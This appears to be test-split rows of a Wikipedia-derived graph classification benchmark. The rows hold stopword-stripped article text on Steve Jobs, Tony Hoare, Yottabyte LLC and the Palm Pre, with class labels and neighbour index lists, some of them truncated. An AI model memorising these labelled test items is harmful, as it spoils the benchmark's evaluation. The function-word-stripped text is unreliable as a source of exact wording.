sculley little control chairman board jobs macintosh division apple ii division operated like separate companies duplicating services although products provided 85 percent apple sales early 1985 company january 1985 annual meeting mention apple ii division employees many left including wozniak stated company going wrong direction last five years sold stock macintosh failure defeat pc strengthened sculley position company may 1985 sculley—encouraged arthur rock—decided reorganize apple proposed plan board would remove jobs macintosh group put charge new product development move would effectively render jobs powerless within apple response jobs developed plan get rid sculley take apple however jobs confronted plan leaked said would leave apple board declined resignation asked reconsider sculley also told jobs votes needed go ahead reorganization months later september 17 1985 jobs submitted letter resignation apple board five additional senior apple employees also resigned joined jobs new venture next following resignation apple 1985 jobs founded next inc. 7 million year later running money sought venture capital product horizon eventually jobs attracted attention billionaire ross perot invested heavily company next computer shown world considered jobs comeback event lavish invitation gala launch event described multimedia extravaganza celebration held louise m. davies symphony hall san francisco california wednesday october 12 1988 steve wozniak said 2013 interview jobs next really getting head together next workstations first released 1990 priced like apple lisa next workstation technologically advanced designed education sector largely dismissed cost-prohibitive educational institutions next workstation known technical strengths chief among object-oriented software development system jobs marketed next products financial scientific academic community highlighting innovative experimental new technologies mach kernel digital signal processor chip built-in ethernet port making use next computer english computer scientist tim berners-lee invented world wide web 1990 cern switzerland revised second generation nextcube released 1990 jobs touted first interpersonal computer would replace personal computer innovative nextmail multimedia email system nextcube could share voice image graphics video email first time interpersonal computing going revolutionize human communications groupwork jobs told reporters jobs ran next obsession aesthetic perfection evidenced development attention nextcube magnesium case put considerable strain next hardware division 1993 sold 50,000 machines next transitioned fully software development release nextstep/intel company reported first profit 1.03 million 1994 1996 next software inc. released webobjects framework web application development next acquired apple inc. 1997 webobjects used build run apple store mobileme services itunes store 1986 jobs funded spinout graphics group later renamed pixar lucasfilm computer graphics division price 10 million 5 million given company capital 5 million paid lucasfilm technology rights first film produced pixar disney partnership toy story 1995 jobs credited executive producer brought fame critical acclaim studio released next 15 years pixar creative chief john lasseter company produced box-office hits bug life 1998 toy story 2 1999 monsters inc. 2001 finding nemo 2003 incredibles 2004 cars 2006 ratatouille 2007 wall-e 2008 2009 toy story 3 2010 finding nemo incredibles ratatouille wall-e toy story 3 received academy award best animated feature award introduced 2001 2003 2004 pixar contract disney running jobs disney chief executive michael eisner tried failed negotiate new partnership early 2004 jobs announced pixar would seek new partner distribute films contract disney expired october 2005 bob iger replaced eisner disney iger quickly worked mend relations jobs pixar january 24 2006 jobs iger announced disney agreed purchase pixar all-stock transaction worth 7.4 billion deal closed jobs became walt disney company largest single shareholder approximately seven percent company stock jobs holdings disney far exceeded eisner holds 1.7 disney family member roy e. disney 2009 death held 1 company stock whose criticisms eisner—especially soured disney relationship pixar—accelerated eisner ousting upon completion merger jobs received 7 disney shares joined board directors largest individual shareholder upon jobs death shares disney transferred steven p. jobs trust led laurene jobs floyd norman pixar described jobs mature mellow individual never interfered creative process filmmakers early june 2014 pixar cofounder walt disney animation studios president ed catmull revealed jobs advised explain understand disagreements catmull released book creativity inc. 2014 recounts numerous experiences working jobs regarding manner dealing jobs catmull writes chrisann brennan notes jobs forced apple apologized many times behavior towards lisa also states jobs said never took responsibility sorry time jobs developed strong relationship lisa nine jobs name birth certificate changed lisa brennan lisa brennan-jobs addition jobs brennan developed working relationship co-parent lisa change brennan credits influence newly found biological sister mona simpson worked repair relationship lisa jobs jobs found mona first finding birth mother joanne schieble simpson shortly left apple jobs contact birth family adoptive mother clara lifetime however would later tell official biographer walter isaacson never wanted paul clara feel like n't consider parents totally parents ... loved much never wanted know search even reporters keep quiet found however 1986 31 clara diagnosed lung cancer began spend great deal time learned details background adoption information motivated find biological mother jobs found birth certificate name san francisco doctor schieble turned pregnant although doctor help jobs alive left letter jobs opened upon death died soon afterwards jobs given letter stated mother unmarried graduate student wisconsin named joanne schieble jobs contacted schieble clara died received permission father paul addition respect paul asked media report search jobs stated motivated find birth mother curiosity need see okay thank 'm glad n't end abortion twenty-three went lot schieble emotional first meeting though n't familiar history apple jobs role told pressured signing adoption papers said regretted giving repeatedly apologized jobs schieble would develop friendly relationship throughout rest life would spend christmas together first visit schieble told jobs sister mona aware brother schieble arranged meet new york mona worked first impression jobs totally straightforward lovely normal sweet guy simpson jobs went long walk get know jobs later told biographer mona completely thrilled first life mother emotionally affectionate toward got know became really good friends family n't know 'd without ca n't imagine better sister adopted sister patty never close jobs learned family history six months given adoption schieble father died wed jandali daughter mona jandali states finishing phd returned syria work period schieble left divorced 1962 also states divorce lost contact mona period time also bear responsibility away daughter four years old mother divorced went syria got back touch 10 years lost touch mother moved n't know since 10 years ago 've constant contact see three times year organized trip last year visit syria lebanon went relative florida years later schieble married ice skating teacher george simpson mona jandali took stepfather last name thus became mona simpson 1970 divorced schieble took mona los angeles raised jobs told official biographer meeting simpson wanted become involved ongoing search father found working sacramento decided simpson would meet jandali simpson spoke several hours point told left teaching restaurant business also said schieble given another child away adoption 'll never see baby baby gone simpson mention met jobs jandali told simpson managed mediterranean restaurant near san jose successful technology people used come even steve jobs ... oh yeah used come sweet guy big tipper hearing visit jobs recalled amazing ... restaurant times remember meeting owner syrian balding shook hands however jobs want meet jandali wealthy man n't trust try blackmail go press ... asked mona tell jandali later discovered relationship jobs online blog contacted simpson asked thing steve jobs simpson told true later commented father thoughtful beautiful storyteller passive ... never contacted steve simpson researched syrian roots began meet members family assumed jobs would eventually want meet father never jobs also never showed interest syrian heritage middle east simpson fictionalized search father 1992 novel lost father malek jandali cousin 1989 jobs first met future wife laurene powell gave lecture stanford graduate school business student soon event stated laurene right front row lecture hall could n't take eyes ... kept losing train thought started feeling little giddy lecture jobs met parking lot invited dinner point forward together minor exceptions rest life powell father died young mother raised middle class new jersey home similar one jobs grew received ba university pennsylvania spent short period high finance found n't interest decided pursue mba stanford instead addition unlike jobs athletic followed professional sports also brought much self-sufficiency relationship private public person jobs proposed new year day 1990 fistful freshly picked wildflowers married march 18 1991 buddhist ceremony ahwahnee hotel yosemite national park fifty people including father paul sister mona attended ceremony conducted jobs guru kobun chino otogawa vegan wedding cake shape yosemite half dome wedding ended hike laurene brothers snowball fight jobs reported said mona see mona ... laurene descended joe namath 're descended john muir jobs powell first child reed born september 1991 jobs father paul died year half later march 5 1993 jobs powell two children erin born august 1995 eve born 1998 family lived palo alto california journalist grew locally remembered owning house scariest halloween decorations palo alto ... n't remember seeing busy terrified 1996 apple announced would buy next 427 million deal finalized february 1997 bringing jobs back company cofounded jobs became de facto chief then-ceo gil amelio ousted july 1997 formally named interim chief executive september march 1998 concentrate apple efforts returning profitability jobs terminated number projects newton cyberdog opendoc coming months many employees developed fear encountering jobs riding elevator afraid might job doors opened reality jobs summary executions rare handful victims enough terrorize whole company jobs changed licensing program macintosh clones making costly manufacturers continue making machines purchase next much company technology found way apple products notably nextstep evolved mac os x jobs guidance company increased sales significantly introduction imac new products since appealing designs powerful branding worked well apple 2000 macworld expo jobs officially dropped interim modifier title apple became permanent ceo jobs quipped time would using title iceo company subsequently branched introducing improving upon digital appliances introduction ipod portable music player itunes digital music software itunes store company made forays consumer electronics music distribution june 29 2007 apple entered cellular phone business introduction iphone multi-touch display cell phone also included features ipod mobile browser revolutionized mobile browsing scene nurturing open-ended innovation jobs also reminded employees real artists ship jobs public war words dell computer ceo michael dell starting 1987 jobs first criticized dell making un-innovative beige boxes october 6 1997 gartner symposium dell asked would ran then-troubled apple computer company said 'd shut give money back shareholders 2006 jobs sent email employees apple market capitalization rose dell jobs admired criticized consummate skill persuasion salesmanship dubbed reality distortion field particularly evident keynote speeches colloquially known stevenotes macworld expos apple worldwide developers conferences jobs board member gap inc. 1999 2002 2001 jobs granted stock options amount 7.5 million shares apple exercise price 18.30 alleged options backdated exercise price 21.10 alleged jobs thereby incurred taxable income 20,000,000 report apple overstated earnings amount result jobs potentially faced number criminal charges civil penalties case subject active criminal civil government investigations though independent internal apple investigation completed december 29 2006 found jobs unaware issues options granted returned without exercised 2003 2005 jobs responded criticism apple poor recycling programs e-waste us lashing environmental advocates apple annual meeting cupertino april weeks later apple announced would take back ipods free retail stores computer takeback campaign responded flying banner plane stanford university graduation jobs commencement speaker banner read steve n't mini-player—recycle e-waste 2006 expanded apple recycling programs us customer buys new mac program includes shipping environmentally friendly disposal old systems success apple unique products services provided several years stable financial returns propelling apple become world valuable publicly traded company 2011 jobs perceived demanding perfectionist always aspired position businesses products forefront information technology industry foreseeing setting innovation style trends summed self-concept end keynote speech macworld conference expo january 2007 quoting ice hockey player wayne gretzky july 1 2008 billion class action suit filed several members apple board directors revenue lost alleged securities fraud 2011 interview biographer walter isaacson jobs revealed met us president barack obama complained nation shortage software engineers told obama headed one-term presidency jobs proposed foreign student got engineering degree us university automatically offered green card meeting jobs commented president smart kept explaining us reasons things ca n't get done infuriates october 2003 jobs diagnosed cancer mid-2004 announced employees cancerous tumor pancreas prognosis pancreatic cancer usually poor jobs stated rare much less aggressive type known islet cell neuroendocrine tumor despite diagnosis jobs resisted doctors recommendations medical intervention nine months instead relying alternative medicine thwart disease according harvard researcher ramzi amri choice alternative treatment led unnecessarily early death doctors agree jobs diet insufficient address disease however cancer researcher alternative medicine critic david gorski wrote impossible know whether much might decreased chances surviving cancer flirtation woo best guess jobs probably modestly decreased chances survival barrie r. cassileth chief memorial sloan kettering cancer center integrative medicine department said jobs faith alternative medicine likely cost life ... kind pancreatic cancer treatable curable ... essentially committed suicide according jobs biographer walter isaacson nine months refused undergo surgery pancreatic cancer – decision later regretted health declined instead tried vegan diet acupuncture herbal remedies treatments found online even consulted psychic also influenced doctor ran clinic advised juice fasts bowel cleansings unproven approaches finally surgery july 2004 eventually underwent pancreaticoduodenectomy whipple procedure july 2004 appeared remove tumor successfully jobs receive chemotherapy radiation therapy jobs absence tim cook head worldwide sales operations apple ran company early august 2006 jobs delivered keynote apple annual worldwide developers conference thin almost gaunt appearance unusually listless delivery together choice delegate significant portions keynote presenters inspired flurry media internet speculation state health contrast according ars technica journal report worldwide developers conference wwdc attendees saw jobs person said looked fine following keynote apple spokesperson said steve health robust two years later similar concerns followed jobs 2008 wwdc keynote address apple officials stated jobs victim common bug taking antibiotics others surmised cachectic appearance due whipple procedure july conference call discussing apple earnings participants responded repeated questions jobs health insisting private matter others said shareholders right know given jobs hands-on approach running company based off-the-record phone conversation jobs new york times reported health problems amounted good deal common bug n't life-threatening n't recurrence cancer august 28 2008 bloomberg mistakenly published 2500-word obituary jobs corporate news service containing blank spaces age cause death news carriers customarily stockpile up-to-date obituaries facilitate news delivery event well-known figure death although error promptly rectified many news carriers blogs reported intensifying rumors concerning jobs health jobs responded apple september 2008 let rock keynote paraphrasing mark twain reports death greatly exaggerated subsequent media event jobs concluded presentation slide reading 110/70 referring blood pressure stating would address questions health december 16 2008 apple announced marketing vice-president phil schiller would deliver company final keynote address macworld conference expo 2009 reviving questions jobs health statement given january 5 2009 apple.com jobs said suffering hormone imbalance several months january 14 2009 jobs wrote internal apple memo previous week learned health-related issues complex originally thought announced six-month leave absence end june 2009 allow better focus health tim cook previously acted ceo jobs 2004 absence became acting ceo apple jobs still involved major strategic decisions 2009 tim cook offered portion liver jobs since share rare blood type donor liver regenerate tissue operation jobs yelled 'll never let 'll never april 2009 jobs underwent liver transplant methodist university hospital transplant institute memphis tennessee jobs prognosis described excellent january 17 2011 year half jobs returned work following liver transplant apple announced granted medical leave absence jobs announced leave letter employees stating decision made could focus health time 2009 medical leave apple announced tim cook would run day-to-day operations jobs would continue involved major strategic decisions company leave jobs appeared ipad 2 launch event march 2 wwdc keynote introducing icloud june 6 cupertino city council june 7 august 24 2011 jobs announced resignation apple ceo writing board always said ever came day could longer meet duties expectations apple ceo would first let know unfortunately day come jobs became chairman board named tim cook successor ceo jobs continued work apple day death six weeks later jobs died palo alto california home around 3 p.m. pdt october 5 2011 due complications relapse previously treated islet-cell pancreatic neuroendocrine tumor resulted respiratory arrest lost consciousness day died wife children sisters side sister mona simpson described death thus steve final words hours earlier monosyllables repeated three times embarking 'd looked sister patty long time children life partner laurene shoulders past steve final words 'oh wow oh wow oh wow lost consciousness died several hours later small private funeral held october 7 2011 details respect jobs family made public apple pixar issued announcements death apple announced day plans public service encouraging well-wishers send remembrance messages email address created receive messages apple microsoft flew flags half-staff throughout respective headquarters campuses bob iger ordered disney properties including walt disney world disneyland fly flags half-staff october 6 12 2011 two weeks following death apple displayed corporate web site simple page showed jobs name lifespan next grayscale portrait october 19 2011 apple employees held private memorial service jobs apple campus cupertino jobs widow laurene attendance well cook bill campbell norah jones al gore coldplay apple retail stores closed briefly employees could attend memorial video service uploaded apple website california governor jerry brown declared sunday october 16 2011 steve jobs day day invitation-only memorial held stanford university attendance included apple tech company executives members media celebrities close friends jobs politicians along jobs family bono yo yo joan baez performed service lasted longer hour service highly secured guards university gates helicopter flying overhead area news station attendee given small brown box farewell gift jobs box contained copy autobiography yogi paramahansa yogananda apple co-founder steve wozniak former owner would become pixar george lucas ref name= http //postcards.blogs.fortune.cnn.com/2011/10/06/george-lucas-steve-jobs/ /ref former rival microsoft co-founder bill gates president barack obama offered statements response death jobs buried unmarked grave alta mesa memorial park nonsectarian cemetery palo alto steve jobs subject number books films lisa brennan-jobs jobs eldest daughter described jobs memoir sexually inappropriate described patterns cruel behavior adolescent years jobs design aesthetic influenced philosophies zen buddhism india experienced buddhism seven-month spiritual journey sense intuition influenced spiritual people studied also learned many references sources modernist architectural style joseph eichler industrial designs richard sapper dieter rams according apple cofounder steve wozniak steve n't ever code n't engineer n't original design ... daniel kottke one apple earliest employees college friend jobs stated woz jobs woz innovator inventor steve jobs marketing person listed either primary inventor co-inventor 346 united states patents patent applications related range technologies actual computer portable devices user interfaces including touch-based speakers keyboards power adapters staircases clasps sleeves lanyards packages jobs contributions patents look feel product industrial design chief jonathan ive name along 200 patents design patents specific product designs example jobs listed primary inventor patents original lamp-style imacs well powerbook g4 titanium opposed utility patents inventions 43 issued us patents inventions patent mac os x dock user interface magnification feature issued day died although jobs little involvement engineering technical side original apple computers jobs later used ceo position directly involve product design involved many projects throughout career long-time marketing executive confidant joanna hoffman known one employees apple next could successfully stand jobs also engaging even terminally ill hospital jobs sketched new devices would hold ipad hospital bed also despised oxygen monitor finger suggested ways revise design simplicity since death former apple ceo 141 patents inventors win lifetimes currently jobs holds 450 patents apple ii 8-bit home computer one world first highly successful mass-produced microcomputer products designed primarily steve wozniak jobs oversaw development apple ii unusual case rod holt developed unique power supply introduced 1977 west coast computer faire jobs wozniak first consumer product sold apple computer lisa personal computer designed apple early 1980s first personal computer offer graphical user interface machine aimed individual business users development lisa began 1978 lisa sold poorly 100,000 units sold 1982 jobs forced lisa project joined macintosh project macintosh direct descendant lisa although obvious similarities systems final revision lisa 2/10 modified sold macintosh xl joined original macintosh team jobs took project wozniak experienced traumatic airplane accident temporarily left company jobs introduced macintosh computer january 24 1984 first mass-market personal computer featuring integral graphical user interface mouse first model later renamed macintosh 128k uniqueness amongst populous family subsequently updated models also based apple proprietary architecture since 1998 apple largely phased macintosh name favor mac though product family nicknamed mac mac since development first model macintosh introduced us 1.5 million ridley scott television commercial 1984 notably aired third quarter super bowl xviii january 22 1984 people consider ad watershed event masterpiece regis mckenna called ad successful mac 1984 uses unnamed heroine represent coming macintosh indicated picasso-style picture computer white tank top means saving humanity conformity ibm attempts dominate computer industry ad alludes george orwell novel nineteen eighty-four describes dystopian future ruled televised big brother macintosh however expensive hindered ability competitive market already dominated commodore 64 consumers well ibm personal computer accompanying clone market businesses macintosh systems still found success education desktop publishing kept apple second-largest pc manufacturer next decade jobs forced apple 1985 started company built workstation computers next computer introduced 1988 lavish launch event tim berners-lee created world first web browser worldwideweb using next computer next computer operating system named nextstep basis darwin kernel operating system apple products namely macos ios watchos audioos apple imac introduced 1998 innovative design directly result jobs return apple apple boasted back computer looks better front anyone else described cartoonlike first imac clad bondi blue plastic unlike personal computer came 1999 apple introduced graphite gray apple imac since varied shape colour size considerably maintaining all-in-one design design ideas intended create connection user handle breathing light effect computer went sleep apple imac sold 1,299 time imac also featured forward-thinking changes eschewing floppy disk drive moving exclusively usb connecting peripherals latter change resulted imac success interface popularised among third-party peripheral makers—as evidenced fact many early usb peripherals made translucent plastic match imac design itunes media player media library online radio broadcaster mobile device management application developed apple used play download organize digital audio video well types media available itunes store personal computers running macos microsoft windows operating systems itunes store also available ipod touch iphone ipad itunes store users purchase download music music videos television shows audiobooks podcasts movies movie rentals countries ringtones available iphone ipod touch fourth generation onward application software iphone ipad ipod touch downloaded app store first generation ipod released october 23 2001 major innovation ipod small size achieved using 1.8 hard drive compared 2.5 drives common players time capacity first generation ipod ranged 5 gb 10 gb ipod sold us 399 100,000 ipods sold end 2001 introduction ipod resulted apple becoming major player music industry also ipod success prepared way itunes music store iphone 1st generation ipod apple released hard drive-based ipod classic touchscreen ipod touch video-capable ipod nano screenless ipod shuffle following years apple began work first iphone 2005 first iphone released june 29 2007 iphone created sensation survey indicated six ten americans aware release time declared invention year 2007 completed iphone multimedia capabilities functioned quad-band touch screen smartphone year later iphone 3g released july 2008 three key features support gps 3g data tri-band umts/hsdpa june 2009 iphone 3gs whose improvements included voice control better camera faster processor introduced phil schiller iphone 4 thinner previous models five megapixel camera capable recording video 720p hd adds secondary front-facing camera video calls major feature iphone 4s introduced october 2011 siri virtual assistant capable voice recognition ipad ios-based line tablet computers designed marketed apple first ipad released april 3 2010 recent ipad models ipad 2017 ipad pro ipad mini 4 released september 9 2015 march 24 2017 user interface built around device multi-touch screen including virtual keyboard ipad includes built-in wi-fi cellular connectivity select models 250 million ipads sold
[ 10755, 9732, 1542, 1549, 7697, 4114, 11289, 1576, 6186, 6700, 5681, 1074, 9778, 9784, 10808, 4669, 8253, 576, 5696, 5699, 8774, 8783, 4180, 10838, 6234, 3167, 9826, 1123, 5733, 8806, 3691, 8303, 2676, 119, 6264, 2686, 6783, 7806, 10878, 1...
Test
2,283
9
Tony_Hoare:tony hoare sir charles antony richard hoare born 11 january 1934 british computer scientist developed sorting algorithm quicksort 1959/1960 also developed hoare logic verifying program correctness formal language communicating sequential processes csp specify interactions concurrent processes including dining philosophers problem inspiration occam programming language born colombo ceylon sri lanka british parents tony hoare father colonial civil servant mother daughter tea planter hoare educated england dragon school oxford king school canterbury studied classics philosophy greats merton college oxford graduating 1956 18 months national service royal navy learned russian returned university oxford 1958 study postgraduate certificate statistics began computer programming taught autocode ferranti mercury leslie fox went moscow state university british council exchange student studied machine translation andrey kolmogorov 1960 hoare left soviet union began working elliott brothers ltd small computer manufacturing firm located london implemented algol 60 began developing major algorithms became professor computing science queen university belfast 1968 1977 returned oxford professor computing lead programming research group oxford university computing laboratory department computer science university oxford following death christopher strachey emeritus professor also principal researcher microsoft research cambridge england hoare significant work following areas sorting selection algorithm quicksort quickselect hoare logic formal language communicating sequential processes csp used specify interactions concurrent processes structuring computer operating systems using monitor concept axiomatic specification programming languages speaking software conference called qcon london 2009 apologised inventing null reference many years leadership oxford department worked formal specification languages csp z achieve expected take-up industry 1995 hoare led reflect upon original assumptions 1962 hoare married jill pym member research team
[ 512, 9345, 4483, 9351, 7048, 9224, 4107, 11020, 1947, 1435, 1702, 428, 10668, 7983, 2482, 8499, 6454, 1976, 4412, 6652, 4799, 4800, 10049, 4930, 7671, 11457, 70, 8262, 10568, 3529, 1610, 1611, 7164, 8524, 10061, 11339, 5456, 5585, 5714, 1...
Test
2,284
7
Yottabyte_LLC:yottabyte llc yottabyte llc software-defined data center sddc company founded 2010 headquartered bloomfield township oakland county michigan yottabyte also operates three physical data centers throughout united states yottabyte software enables companies build virtual data centers industry standard server storage networking gear software yottabyte founded 2010 founders include greg campbell vice president technology paul e. hodges iii president ceo duane tursi yottabyte concept originated campbell hodges sitting conference room tossing around ideas campbell cto developed yottabyte software architecture yottabyte llc named cool vendor compute platform gartner 2016 runner virtualization trailblazers 2015 tech trailblazers september 2016 yottabyte partnered university michigan accelerate data-intensive research project known yottabyte research cloud gives scientists access high-performance secure flexible computing environments enables analysis sensitive data sets restricted federal privacy laws proprietary access agreements confidentiality requirements may 2017 yottabyte brought michael j. aloe board senior vice president sales operations aloe announced chief operations officer coo may 2018
[ 1801, 8446, 6703 ]
Test
2,285
2
Palm_Pre:palm pre palm pre styled palm prē multitasking smartphone designed marketed palm multi-touch screen sliding keyboard smartphone first use palm linux based mobile operating system webos pre functions camera phone portable media player location navigation capabilities pre also serves personal information manager number communication collaboration applications bluetooth wi-fi connectivity built-in pre launched united states america june 6 2009 sprint later canada bell mobility gsm version original pre launched later 2009 number networks europe mexico revised model palm pre plus doubled available memory internal storage launched january 25 2010 verizon wireless later released mobility may 16 2010 third generation palm pre palm pre 2 uses hp webos 2.0 announced october 2010 palm pre became fastest selling phone sprint history widely praised device palm debuted pre 2009 consumer electronics show first mobile phone use texas instruments omap 3430 processor well initial us exclusive carrier agreement sprint operates cdma network prior device launch known internally codename castle white castle 'slider hamburgers since palm first slider phone apple accused pre copying elements user interface apple coo tim cook stating stand people ripping ip palm responding tools necessary defend hinting palm large portfolio patents may 19 2009 sprint palm announced pre would available beginning june 6 2009 united states may 28 2009 verizon wireless announced would also carry palm pre six months later comment sprint spokesperson indicated launch carrier would us exclusivity rights pre 2009 sprint ceo dan hesse commented company palm agreed discuss length exclusivity deal remarked six months july 7 2009 telefónica announced would exclusively carry palm pre uk spain ireland germany o2 movistar networks availability winter holidays palm pre available longer available uk july 27 2009 company second quarter conference call verizon chief operating officer denny strigl announced verizon wireless would begin selling palm pre early 2010 news coverage launch noted sales quantity record sprint phone launch estimated sales approximately 50,000 units day 100,000 week however reports stated sales pre july beginning august much lower expected august 27 2009 bell canada made palm pre available bell supporting data services evdo network november 11 2009 palm announced pre would available mexico naming telcel exclusive carrier pre nation sales mexico began november 27 new version smartphone palm pre plus announced ces 2010 differences included removal center button 16 gb storage memory 8 gb original pre doubling ram 256 mb 512 mb back cover already touchstone compatible keyboard slider mechanism also refined us initially sold exclusively along pixi plus verizon wireless march 22 2010 palm announced would releasing pre plus pixi plus network coming months o2 launched palm pre plus may 16 2010 us 149.99 free touchstone charger new customers october 19 2010 hp announced third generation palm pre palm pre 2 used hp webos 2.0 device 1 ghz processor 512 mb ram 5-megapixel camera adobe flash player 10.1 beta durable hardware including gorilla glass screen phone released consumers france 2010 october sfr canada 2010 december rogers u.s. 2011 february verizon also available unlocked hp hp stated verizon wireless customers would able use skype mobile skype-to-skype calls messaging webos 2.0 released consumer use december 2011 hp provided firmware update 2.2.4 original palm pre cpu 600 mhz texas instruments omap 3430 arm cortex a8 powervr sgx underclocked 500 mhz uses marvell sd8686 chip wireless lan sdio adapter wifi stmicroelectronics vx6852 3.15-megapixel resolution sensor 2048 x 1536 camera pre phones feature 3.1-inch capacitive touchscreen 24-bit color 320×480 resolution hvga liquid-crystal display touchscreen allows manipulation ui fingers instead stylus commonly used older palm phones pdas display gesture area touch-sensitive area led underlighting permits additional touch commands pre full qwerty keyboard pre keyboard slides curved ergonomics addition keyboard device features single button center gesture area absent pre plus volume rocker switch side ringer switch top pre features three input sensors allow respond surroundings accelerometer automatically changes orientation display landscape portrait device rotated user hands ambient light sensor allows pre automatically adjust brightness display proximity sensor allows pre disregard touch inputs phone held close user face call original pre 3 megapixel digital camera led flash pre available high-speed connectivity either evdo rev umts hsdpa depending location pre also includes 802.11b/g wifi bluetooth 2.1+edr support a2dp stereo headsets a-gps support turn-by-turn navigation also included though access agps features remains locked verizon wireless users charging data-transfer pre uses microusb connector usb 2.0 support audio output supported standard 3.5 mm headphone jack phone reports support bluetooth dun protocol sprint permitted use pre tethered phone modem mode verizon support tethering via mobile hot spot support homebrew community many patches apps allow change settings pre one includes free hotspot app sprint users pre 8 gb internal flash storage approximately 7.4 gb user accessible pre flash memory card slot pre plus 16 gb internal flash storage pre charged either using supplied microusb cable using optional accessory wireless charging using electromagnetic induction charging dock dubbed touchstone charger touchstone charger requires compatible back cover also sold separately pre pre plus comes touchstone-compatible back cover included possible access developer mode writing konami code entered upupdowndownleftrightleftrightbastart home screen also possible write webos20090606 pre first palm device use webos linux-based platform replaced palm previous palm os webos interface based system cards used manage multitasking webos also supports multi-touch gestures enabling navigational input made using touchscreen pre include virtual keyboard portrait-oriented slide-out keyboard onscreen virtual keyboard embedded code made available third party patch hundreds third party patches allow users customize usability interface pre webos includes feature called synergy integrates information many sources webos allows user sign accounts gmail yahoo facebook linkedin microsoft outlook via exchange activesync contacts sources integrated single list synergy highly innovative regarded many highlight new operating system received criticism undiscerning included contacts application example engadget commented contacts simply birthdays extracted facebook device makes use cloud based services model uses desktop sync client style palm hotsync synchronization method however palm referenced number solutions users need sync desktop software like palm desktop microsoft outlook ibm lotus notes additionally mark/space inc. announced macintosh desktop sync software chapura software windows palm offered online guide help customers official homebrew third-party packages webos reviewed main article according former debian developer joey hess palm pre periodically sends users information palm palm gathers users gps information along data every application used long used information uploaded palm daily basis opt-out user first uses gps system common mobile carriers google maps also opt-out gps data sent google showcased 2009 january five months prelaunch pre received positive reviews winning cnet best show best category cell phones smartphones people voice ces 2009 palm pre suffered numerous quality issues slider mechanism felt loose could cause wiggle issue became known oreo twist users palm aimed address issue pre plus making slider mechanism stronger curved plastic screen seemed delicate sometimes cracking pocket reports faulty headphone jacks palm pre plus characters sometimes appeared twice typing although user hit key many reviews noted poor build quality phones engadget second open letter palm cited hardware issues plagued pre outward acknowledgment rush correct added 've seen countless reports read many blog posts recall heard sorts horror stories broken sliders power buttons stop functioning oreo cookie effect hell even first review unit broke overall sales modest outset users expressed intense concern slow pace webos upgrade releases absence substantially improved hardware comments critical lengthy delay releasing promised flash application dysfunctional document handling pdf files speculation could underlying technological business reasons slow release webos 2 upgrade existing phones concern eventually released webos 2 upgrade would incompatible palm os emulation media opinion 2010 december enthusiastic fastest-selling cell phone sprint history pre described palm swan song since sales enough keep company afloat leading acquisition hp nonetheless pre still regarded innovative even ten years launch
[ 1537, 3585, 4609, 2308, 9605, 6790, 10500, 3340, 1682, 2962, 405, 3606, 8982, 10393, 5019, 8735, 6178, 2345, 5164, 8621, 303, 9266, 9013, 694, 823, 1849, 1083, 1728, 7492, 10820, 5318, 199, 11337, 9163, 9037, 2258, 2259, 1621, 6618, 5339,...
None